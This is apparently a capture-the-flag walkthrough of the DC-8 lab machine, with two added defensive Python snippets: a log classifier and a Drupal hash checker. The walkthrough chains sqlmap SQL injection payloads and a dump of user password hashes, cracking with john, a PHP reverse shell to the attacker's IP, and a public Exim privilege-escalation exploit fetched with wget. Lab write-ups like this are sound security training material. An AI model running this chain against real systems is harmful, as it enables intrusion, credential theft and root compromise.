Contents
- Information collection
- Penetration
- 1. Obtaining the username and password with sqlmap
- 2. Reverse shell via the web interface
- 3. Privilege escalation via SUID
Information collection
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 08:00:27:67:e3:7c, IPv4: 192.168.155.245
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.155.53	1a:ca:aa:46:d5:7f	(Unknown: locally administered)
192.168.155.207	08:00:27:45:85:d6	PCS Systemtechnik GmbH
192.168.155.227	30:03:c8:49:52:4d	CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD.

8 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.024 seconds (126.48 hosts/sec). 3 responded

┌──(root㉿anla)-[~]
└─# nmap 192.168.155.207
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-26 23:12 EDT
Nmap scan report for 192.168.155.207
Host is up (0.000046s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:45:85:D6 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.19 seconds

┌──(root㉿anla)-[~]
└─# nmap -T4 -p- -A 192.168.155.207
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-26 23:12 EDT
Nmap scan report for 192.168.155.207
Host is up (0.00031s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
|   2048 35:a7:e6:c4:a8:3c:63:1d:e1:c0:ca:a3:66:bc:88:bf (RSA)
|   256 ab:ef:9f:69:ac:ea:54:c6:8c:61:55:49:0a:e7:aa:d9 (ECDSA)
|_  256 7a:b2:c6:87:ec:93:76:d4:ea:59:4b:1b:c6:e8:73:f2 (ED25519)
80/tcp open  http    Apache httpd
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-title: Welcome to DC-8 | DC-8
|_http-generator: Drupal 7 (http://drupal.org)
|_http-server-header: Apache
MAC Address: 08:00:27:45:85:D6 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.31 ms 192.168.155.207

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.84 seconds

└─# whatweb http://192.168.155.207/
http://192.168.155.207/ [200 OK] Apache, Content-Language[en], Country[RESERVED][ZZ], Drupal, HTTPServer[Apache], IP[192.168.155.207], JQuery, MetaGenerator[Drupal 7 (http://drupal.org)], Script[text/javascript], Title[Welcome to DC-8 | DC-8], UncommonHeaders[x-content-type-options,x-generator,link], X-Frame-Options[SAMEORIGIN]

└─# dirsearch -u http://192.168.155.207/ | grep "200"
200    33KB  http://192.168.155.207/CHANGELOG.txt
200   769B   http://192.168.155.207/COPYRIGHT.txt
200     1KB  http://192.168.155.207/install.php
200   868B   http://192.168.155.207/INSTALL.mysql.txt
200     1KB  http://192.168.155.207/install.php?profile=default
200     6KB  http://192.168.155.207/INSTALL.txt
200   842B   http://192.168.155.207/INSTALL.pgsql.txt
200     7KB  http://192.168.155.207/LICENSE.txt
200     2KB  http://192.168.155.207/MAINTAINERS.txt
200     2KB  http://192.168.155.207/node
200     2KB  http://192.168.155.207/README.txt
200   744B   http://192.168.155.207/robots.txt
200     0B   http://192.168.155.207/sites/example.sites.php
200   715B   http://192.168.155.207/sites/all/modules/README.txt
200   431B   http://192.168.155.207/sites/README.txt
200   545B   http://192.168.155.207/sites/all/themes/README.txt
200   129B   http://192.168.155.207/sites/all/libraries/README.txt
200     3KB  http://192.168.155.207/UPGRADE.txt
200     2KB  http://192.168.155.207/user
200     2KB  http://192.168.155.207/user/
200     2KB  http://192.168.155.207/user/login/
200   177B   http://192.168.155.207/views/ajax/autocomplete/user/a
200     2KB  http://192.168.155.207/web.config
200    42B   http://192.168.155.207/xmlrpc.php
Penetration
1. Obtaining the username and password with sqlmap
While clicking around the home page, I found an injection point in the URL: http://192.168.155.207/?nid=1. Let's try sqlmap.
└─# sqlmap -u http://192.168.155.207/?nid=1
...
sqlmap identified the following injection point(s) with a total of 47 HTTP(s) requests:
---
Parameter: nid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: nid=1 AND 5794=5794

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: nid=1 AND (SELECT 2533 FROM(SELECT COUNT(*),CONCAT(0x717a706a71,(SELECT (ELT(2533=2533,1))),0x716a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: nid=1 AND (SELECT 7774 FROM (SELECT(SLEEP(5)))IWeE)

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: nid=-1943 UNION ALL SELECT CONCAT(0x717a706a71,0x6b5a755051747278644c705a59684f736b464e7a6a44454f776959527776796a6242614e446d7476,0x716a6b6271)-- -
---
[23:38:13] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[23:38:13] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 25 times
[23:38:13] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.155.207'

[*] ending @ 23:38:13 /2024-04-26/
# shows that the parameter is injectable
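From the defender's side, the four probe families sqlmap reports above leave distinctive traces in the Apache access log, and the 25 HTTP 500s are a second signal. The following Python is an added example, not code from this writeup, that classifies access-log lines and tallies suspect clients; the log lines and the sqlmap/1.8 user-agent string are constructed samples mirroring the payloads shown above.

```python
import re
from urllib.parse import unquote_plus
# One regex per probe family that sqlmap reported for the nid parameter.
PROBES = {
    "boolean-blind": re.compile(r"\bAND\s+\d+\s*=\s*\d+", re.I),
    "error-based": re.compile(r"INFORMATION_SCHEMA|FLOOR\(RAND\(", re.I),
    "time-blind": re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I),
    "union": re.compile(r"UNION\s+(ALL\s+)?SELECT", re.I),
}
SCANNER_UA = re.compile(r"sqlmap", re.I)
# Apache "combined" log format: ip ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<url>\S+) [^"]*" '
                    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')
# Constructed sample lines mirroring the payloads sqlmap used above (percent-encoded on the wire).
SAMPLE_LOG = [
    '192.168.155.245 - - [26/Apr/2024:23:37:40 -0400] "GET /?nid=1 HTTP/1.1" 200 7451 "-" "Mozilla/5.0"',
    '192.168.155.245 - - [26/Apr/2024:23:37:41 -0400] "GET /?nid=1%20AND%205794%3D5794 HTTP/1.1" 200 7451 "-" "sqlmap/1.8"',
    '192.168.155.245 - - [26/Apr/2024:23:37:42 -0400] "GET /?nid=1%20AND%20(SELECT%207774%20FROM%20(SELECT(SLEEP(5)))IWeE) HTTP/1.1" 200 7451 "-" "sqlmap/1.8"',
    '192.168.155.245 - - [26/Apr/2024:23:37:43 -0400] "GET /?nid=-1943%20UNION%20ALL%20SELECT%20CONCAT(0x717a706a71,0x41,0x716a6b6271)--%20- HTTP/1.1" 500 0 "-" "sqlmap/1.8"',
    '192.168.155.53 - - [26/Apr/2024:23:40:00 -0400] "GET /user/login/ HTTP/1.1" 200 2011 "-" "Mozilla/5.0"',
]

def classify(line):
    """Return (client_ip, status, [probe labels]) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = unquote_plus(m.group("url"))  # inspect the decoded query, not the %-escaped form
    hits = [name for name, rx in PROBES.items() if rx.search(url)]
    if SCANNER_UA.search(m.group("ua")):
        hits.append("sqlmap-ua")
    return m.group("ip"), int(m.group("status")), hits

def summarize(lines):
    """Tally per client; any client that trips at least one probe family is returned as a suspect."""
    tally = {}
    for line in lines:
        parsed = classify(line)
        if parsed is None:
            continue
        ip, status, hits = parsed
        rec = tally.setdefault(ip, {"requests": 0, "errors": 0, "families": set()})
        rec["requests"] += 1
        rec["errors"] += int(status == 500)  # the sqlmap run above produced 25 of these
        rec["families"].update(hits)
    return {ip: rec for ip, rec in tally.items() if rec["families"]}

if __name__ == "__main__":
    for ip, rec in summarize(SAMPLE_LOG).items():
        print(ip, rec["requests"], "requests,", rec["errors"], "HTTP 500s,", sorted(rec["families"]))
```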
Get databases:
available databases [2]:
[*] d7db
[*] information_schema

Get tables:
Database: d7db
[88 tables]
+-----------------------------+
| block                       |
| cache                       |
| filter                      |
| history                     |
| role                        |
| system                      |
| actions                     |
| authmap                     |
| batch                       |
| block_custom                |
| block_node_type             |
| block_role                  |
| blocked_ips                 |
| cache_block                 |
| cache_bootstrap             |
| cache_field                 |
| cache_filter                |
| cache_form                  |
| cache_image                 |
| cache_menu                  |
| cache_page                  |
| cache_path                  |
| cache_views                 |
| cache_views_data            |
| ckeditor_input_format       |
| ckeditor_settings           |
| ctools_css_cache            |
| ctools_object_cache         |
| date_format_locale          |
| date_format_type            |
| date_formats                |
| field_config                |
| field_config_instance       |
| field_data_body             |
| field_data_field_image      |
| field_data_field_tags       |
| field_revision_body         |
| field_revision_field_image  |
| field_revision_field_tags   |
| file_managed                |
| file_usage                  |
| filter_format               |
| flood                       |
| image_effects               |
| image_styles                |
| menu_custom                 |
| menu_links                  |
| menu_router                 |
| node                        |
| node_access                 |
| node_revision               |
| node_type                   |
| queue                       |
| rdf_mapping                 |
| registry                    |
| registry_file               |
| role_permission             |
| search_dataset              |
| search_index                |
| search_node_links           |
| search_total                |
| semaphore                   |
| sequences                   |
| sessions                    |
| shortcut_set                |
| shortcut_set_users          |
| site_messages_table         |
| taxonomy_index              |
| taxonomy_term_data          |
| taxonomy_term_hierarchy     |
| taxonomy_vocabulary         |
| url_alias                   |
| users                       |
| users_roles                 |
| variable                    |
| views_display               |
| views_view                  |
| watchdog                    |
| webform                     |
| webform_component           |
| webform_conditional         |
| webform_conditional_actions |
| webform_conditional_rules   |
| webform_emails              |
| webform_last_download       |
| webform_roles               |
| webform_submissions         |
| webform_submitted_data      |
+-----------------------------+

Get columns:
Database: d7db
Table: users
[16 columns]
+------------------+------------------+
| Column           | Type             |
+------------------+------------------+
| data             | longblob         |
| language         | varchar(12)      |
| name             | varchar(60)      |
| status           | tinyint(4)       |
| access           | int(11)          |
| created          | int(11)          |
| init             | varchar(254)     |
| login            | int(11)          |
| mail             | varchar(254)     |
| pass             | varchar(128)     |
| picture          | int(11)          |
| signature        | varchar(255)     |
| signature_format | varchar(255)     |
| theme            | varchar(255)     |
| timezone         | varchar(32)      |
| uid              | int(10) unsigned |
+------------------+------------------+

Get passwords:
Database: d7db
Table: users
[3 entries]
+-----+---------+------------+-----------------------+---------------------------------------------------------+
| uid | name    | login      | mail                  | pass                                                    |
+-----+---------+------------+-----------------------+---------------------------------------------------------+
| 0   | <blank> | 0          | <blank>               | <blank>                                                 |
| 1   | admin   | 1567766626 | dcau-user@outlook.com | $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z |
| 2   | john    | 1567497783 | john@blahsdfsfd.org   | $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF |
+-----+---------+------------+-----------------------+---------------------------------------------------------+

# Final command:
└─# sqlmap -u http://192.168.155.207/?nid=1 -D d7db -T users -C uid,name,login,mail,pass --dump
Crack the hashed passwords taken from the database
└─# cat DC_8_passwd.txt
$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF
$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z

└─# john DC_8_passwd.txt
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (Drupal7, $S$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 32768 for all loaded hashes
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
turtle           (?)
Proceeding with incremental:ASCII
1g 0:00:27:13 3/3 0.000612g/s 1235p/s 1236c/s 1236C/s lj0803..lj082a
Use the "--show" option to display all of the cracked passwords reliably
Session aborted
# this ran for quite a while and only recovered one password: turtle
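The cost that made this run take 27 minutes at roughly 1235 candidates per second is encoded in the hash itself: the character after "$S$" is the log2 of the SHA-512 round count, and "D" means 2^15 = 32768, the "Cost 1" john printed. The following Python is an added example, not code from this writeup or from Drupal, that reimplements Drupal 7's $S$ scheme (phpass-style SHA-512 with Drupal's own base64 alphabet) to decode that header and verify a password; it takes john's hash from the dump above as input.

```python
import hashlib
import hmac
# Alphabet shared by phpass and Drupal 7; the character after "$S$" indexes into it to give log2(rounds).
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
HASH_LENGTH = 55  # Drupal 7 keeps only the first 55 chars of setting + encoded digest

def parse_setting(stored):
    """Split a $S$ hash into (log2 rounds, 8-char salt); 'D' in column 3 means 2**15 = 32768 rounds."""
    if not stored.startswith("$S$") or len(stored) < 12:
        raise ValueError("not a Drupal 7 SHA-512 hash")
    return ITOA64.index(stored[3]), stored[4:12]

def _encode64(raw):
    """phpass-style base64 (little-endian 6-bit groups, no padding), not RFC 4648."""
    out, i, n = [], 0, len(raw)
    while i < n:
        value = raw[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < n: value |= raw[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= n: break
        i += 1
        if i < n: value |= raw[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= n: break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)

def drupal7_hash(password, setting):
    """Recompute the stored string: sha512(salt + pw), then 2**log2 further rounds of sha512(prev + pw)."""
    log2, salt = parse_setting(setting)
    pw = password.encode()
    digest = hashlib.sha512(salt.encode() + pw).digest()
    for _ in range(1 << log2):
        digest = hashlib.sha512(digest + pw).digest()
    return (setting[:12] + _encode64(digest))[:HASH_LENGTH]

def verify(password, stored):
    """Constant-time comparison of the recomputed hash against the stored one."""
    return hmac.compare_digest(drupal7_hash(password, stored), stored)

if __name__ == "__main__":
    # Hash of user john as dumped from d7db.users above; "turtle" is the password john the ripper recovered.
    john = "$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF"
    log2, salt = parse_setting(john)
    print(f"salt={salt} rounds=2**{log2}={1 << log2}")
    print("password 'turtle' verifies:", verify("turtle", john))
```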
Log in on the web (http://192.168.155.207/user/login/); logging in with the username john succeeds.
2. Reverse shell via the web interface
After clicking around for a while, I found that under Find content -> WEBFORMS -> Components (Contact Us) -> Form settings -> Text format the format can be changed to PHP code. I tried writing <?php phpinfo(); ?> into the Confirmation message, clicked Save at the bottom, and after submitting the Contact form once the phpinfo page was displayed.
Next, write PHP code for a reverse shell
<?php system("bash -c 'sh -i &>/dev/tcp/192.168.155.245/1234 0>&1'");?>

└─# nc -lvvp 1234
listening on [any] 1234 ...
192.168.155.207: inverse host lookup failed: Unknown host
connect to [192.168.155.245] from (UNKNOWN) [192.168.155.207] 42840
sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
3. Privilege escalation via SUID
Escalating privileges
www-data@dc-8:/$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/newgrp
/usr/sbin/exim4
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/bin/ping
/bin/su
/bin/umount
/bin/mount
www-data@dc-8:/$ exim4 --version
exim4 --version
Exim version 4.89 #2 built 14-Jun-2017 05:03:07
Copyright (c) University of Cambridge, 1995 - 2017
(c) The Exim Maintainers and contributors in ACKNOWLEDGMENTS file, 2007 - 2017
Berkeley DB: Berkeley DB 5.3.28: (September 9, 2013)
Support for: crypteq iconv() IPv6 GnuTLS move_frozen_messages DKIM DNSSEC Event OCSP PRDR SOCKS TCP_Fast_Open
Lookups (built-in): lsearch wildlsearch nwildlsearch iplsearch cdb dbm dbmjz dbmnz dnsdb dsearch nis nis0 passwd
Authenticators: cram_md5 plaintext
Routers: accept dnslookup ipliteral manualroute queryprogram redirect
Transports: appendfile/maildir/mailstore autoreply lmtp pipe smtp
Fixed never_users: 0
Configure owner: 0:0
Size of off_t: 8
Configuration file is /var/lib/exim4/config.autogenerated
Use searchsploit to look for exploitable vulnerabilities in this program
└─# searchsploit exim --id    # show the EDB-ID instead of the local path
---------------------------------------------- ---------------------------------
 Exploit Title                                |  EDB-ID
---------------------------------------------- ---------------------------------
Dovecot with Exim - 'sender_address' Remote C | 25297
Exim - 'GHOST' glibc gethostbyname Buffer Ove | 36421
Exim - 'perl_startup' Local Privilege Escalat | 39702
Exim - 'sender_address' Remote Code Execution | 25970
Exim 3.x - Format String                      | 20900
Exim 4 (Debian 8 / Ubuntu 16.04) - Spool Priv | 40054
Exim 4.41 - 'dns_build_reverse' Local Buffer  | 756
Exim 4.41 - 'dns_build_reverse' Local Read Em | 1009
Exim 4.42 - Local Privilege Escalation        | 796
Exim 4.43 - 'auth_spa_server()' Remote        | 812
Exim 4.63 - Remote Command Execution          | 15725
Exim 4.84-3 - Local Privilege Escalation      | 39535
Exim 4.87 - 4.91 - Local Privilege Escalation | 46996
Exim 4.87 / 4.91 - Local Privilege Escalation | 47307
Exim 4.87 < 4.91 - (Local / Remote) Command E | 46974
Exim 4.89 - 'BDAT' Denial of Service          | 43184
exim 4.90 - Remote Code Execution             | 45671
Exim < 4.86.2 - Local Privilege Escalation    | 39549
Exim < 4.90.1 - 'base64d' Remote Code Executi | 44571
Exim Buffer 1.6.2/1.6.51 - Local Overflow     | 20333
Exim ESMTP 4.80 - glibc gethostbyname Denial  | 35951
Exim Internet Mailer 3.35/3.36/4.10 - Format  | 22066
Exim Sender 3.35 - Verification Remote Stack  | 24093
Exim4 < 4.69 - string_format Function Heap Bu | 16925
PHPMailer < 5.2.20 with Exim MTA - Remote Cod | 42221
---------------------------------------------- ---------------------------------
Shellcodes: No Results

┌──(root㉿anla)-[~]
└─# searchsploit -p 46996    # look up the details by id
  Exploit: Exim 4.87 - 4.91 - Local Privilege Escalation
      URL: https://www.exploit-db.com/exploits/46996
     Path: /usr/share/exploitdb/exploits/linux/local/46996.sh
    Codes: CVE-2019-10149
 Verified: True
File Type: Bourne-Again shell script, ASCII text executable
Looking at 46996.sh, its header says the script should be uploaded to the target machine and describes two privilege escalation methods; this time the second one is used.
# Usage (setuid method):
# $ id
# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
# $ ./raptor_exim_wiz -m setuid
# Preparing setuid shell helper...
# Delivering setuid payload...
# [...]
# Waiting 5 seconds...
# -rwsr-xr-x 1 root raptor 8744 Jun 16 13:03 /tmp/pwned
# # id
# uid=0(root) gid=0(root) groups=0(root)
#
# Usage (netcat method):
# $ id
# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
# $ ./raptor_exim_wiz -m netcat
# Delivering netcat payload...
# Waiting 5 seconds...
# localhost [127.0.0.1] 31337 (?) open
# id
# uid=0(root) gid=0(root) groups=0(root)
Start a temporary web server on the attacking machine
└─# cp /usr/share/exploitdb/exploits/linux/local/46996.sh ./
└─# python -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
Fetch the exploit script on the target machine
www-data@dc-8:/$ wget http://192.168.155.245:8080/46996.sh
wget http://192.168.155.245:8080/46996.sh
--2024-04-27 21:39:39--  http://192.168.155.245:8080/46996.sh
Connecting to 192.168.155.245:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3552 (3.5K) [text/x-sh]
46996.sh: Permission denied

Cannot write to '46996.sh' (Permission denied).
# no write permission in the current directory…
www-data@dc-8:/$ ls
ls
bin etc initrd.img.old lost+found opt run sys var
boot home lib media proc sbin tmp vmlinuz
dev initrd.img lib64 mnt root srv usr vmlinuz.old
www-data@dc-8:/$ cd tmp
cd tmp
www-data@dc-8:/tmp$ wget http://192.168.155.245:8080/46996.sh
wget http://192.168.155.245:8080/46996.sh
--2024-04-27 21:40:15-- http://192.168.155.245:8080/46996.sh
Connecting to 192.168.155.245:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3552 (3.5K) [text/x-sh]
Saving to: '46996.sh'

46996.sh            100%[===================>]   3.47K  --.-KB/s    in 0s

2024-04-27 21:40:15 (790 MB/s) - '46996.sh' saved [3552/3552]

www-data@dc-8:/tmp$ ls
ls
46996.sh
www-data@dc-8:/tmp$ chmod +x 46996.sh
chmod +x 46996.sh
Run it and obtain root privileges
$ ./46996.sh -m netcat
./46996.sh -m netcat

raptor_exim_wiz - "The Return of the WIZard" LPE exploit
Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>

Delivering netcat payload...
220 dc-8 ESMTP Exim 4.89 Sat, 27 Apr 2024 21:52:39 +1000
250 dc-8 Hello ip6-localhost [::1]
250 OK
250 Accepted
354 Enter message, ending with "." on a line by itself
250 OK id=1s0gbf-0000JM-FP
221 dc-8 closing connection
Waiting 5 seconds...
localhost [127.0.0.1] 31337 (?) open
id
id
uid=0(root) gid=113(Debian-exim) groups=113(Debian-exim)
cd /root
cd /root
ls
ls
flag.txt
cat flag.txt
cat flag.txt
Brilliant - you have succeeded!!!

[ASCII-art banner omitted]

Hope you enjoyed DC-8.  Just wanted to send a big thanks out there to all those
who have provided feedback, and all those who have taken the time to complete these little
challenges.

I'm also sending out an especially big thanks to:

@4nqr34z
@D4mianWayne
@0xmzfr
@theart42

This challenge was largely based on two things:

1. A Tweet that I came across from someone asking about 2FA on a Linux box, and whether it was worthwhile.
2. A suggestion from @theart42

The answer to that question is...

If you enjoyed this CTF, send me a tweet via @DCAU7.